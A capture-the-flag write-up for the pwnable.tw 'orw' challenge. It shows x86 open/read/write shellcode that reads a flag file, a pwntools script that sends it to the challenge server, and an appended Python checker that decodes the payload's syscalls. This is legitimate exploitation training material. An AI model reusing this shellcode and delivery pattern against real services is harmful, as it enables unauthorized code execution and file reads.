pwnable.tw orw

Damn, can't sleep in the middle of the night.

From the program we can see that the shellcode it reads in will be executed, but only three system calls (open, read and write) may be used to open /home/orw/flag.
Generating the shellcode

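from pwn import *

context(log_level='debug')
code = """
.global _start
_start:
    jmp file                /* go to the call so the path's address gets pushed */
sys_shell:
    mov ecx,0x0             /* flags = O_RDONLY */
    mov eax,0x5             /* sys_open */
    pop ebx                 /* ebx = address of the path string after the call */
    int 0x80
    mov ebx,eax             /* fd returned by open */
    mov eax,0x3             /* sys_read */
    mov ecx,0x0804A040      /* buffer address */
    mov edx,0x50            /* length */
    int 0x80
    xor ebx,ebx             /* fd 0 */
    mov eax,0x04            /* sys_write; ecx and edx are unchanged */
    int 0x80
file:
    call sys_shell
    .string "/home/orw/flag"
"""
context(arch='x86', os='linux', endian='little', word_size=32)
shellcode = asm(code).hex()

# Print the assembled bytes as a \xNN escaped string.
shell = ""
while len(shellcode):
    shell += r'\x' + shellcode[:2]
    shellcode = shellcode[2:]
print(shell)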

#!/usr/bin/env python
from pwn import *

io = remote('chall.pwnable.tw', 10001)
# Bytes printed by the generator script above.
shellcode = b"\xeb\x29\xb9\x00\x00\x00\x00\xb8\x05\x00\x00\x00\x5b\xcd\x80\x89\xc3\xb8\x03\x00\x00\x00\xb9\x40\xa0\x04\x08\xba\x50\x00\x00\x00\xcd\x80\x31\xdb\xb8\x04\x00\x00\x00\xcd\x80\xe8\xd2\xff\xff\xff\x2f\x68\x6f\x6d\x65\x2f\x6f\x72\x77\x2f\x66\x6c\x61\x67\x00"
io.recvuntil(b":")
io.send(shellcode)
io.interactive()
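
Added example, not part of the original post: a static check of the payload bytes above that lists the eax value at each `int 0x80`, compares it with the open/read/write allowlist, and resolves the jmp-call-pop string that `pop ebx` receives. The names `analyze` and `ALLOWED` are hypothetical, the syscall numbers are the i386 ones, and the opcode table covers only the instructions this payload uses.

```python
import struct

# Payload bytes copied from the exploit script on this page.
PAYLOAD = bytes.fromhex(
    "eb29b900000000b8050000005bcd8089c3b803000000b940a00408"
    "ba50000000cd8031dbb804000000cd80e8d2ffffff"
    "2f686f6d652f6f72772f666c616700"
)
ALLOWED = {3: "read", 4: "write", 5: "open"}  # i386 syscall numbers


def analyze(code):
    """Linear-decode the few opcodes this payload uses; stop at the first unknown one."""
    off, eax = 0, None
    info = {"syscalls": [], "jmp_target": None, "call_target": None, "path": None}
    while off < len(code):
        op = code[off]
        if 0xB8 <= op <= 0xBF:                    # mov r32, imm32
            if op == 0xB8:
                eax = struct.unpack_from("<I", code, off + 1)[0]
            off += 5
        elif op == 0xCD:                          # int imm8
            if code[off + 1] == 0x80:
                info["syscalls"].append(eax)      # None: eax was not a known constant
            eax = None                            # the return value overwrites eax
            off += 2
        elif op in (0x89, 0x31) and code[off + 1] >= 0xC0:  # mov/xor r/m32, r32
            if code[off + 1] & 7 == 0:            # destination (r/m field) is eax
                eax = None
            off += 2
        elif 0x58 <= op <= 0x5F:                  # pop r32
            if op == 0x58:
                eax = None
            off += 1
        elif op == 0xEB:                          # jmp rel8
            info["jmp_target"] = off + 2 + struct.unpack_from("<b", code, off + 1)[0]
            off += 2
        elif op == 0xE8:                          # call rel32 pushes the next address
            info["call_target"] = off + 5 + struct.unpack_from("<i", code, off + 1)[0]
            off += 5
            info["path"] = code[off:].split(b"\0", 1)[0].decode("ascii", "replace")
        else:
            break                                 # data, or an opcode outside this table
    info["disallowed"] = [n for n in info["syscalls"] if n not in ALLOWED]
    return info


if __name__ == "__main__":
    print(analyze(PAYLOAD))
```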
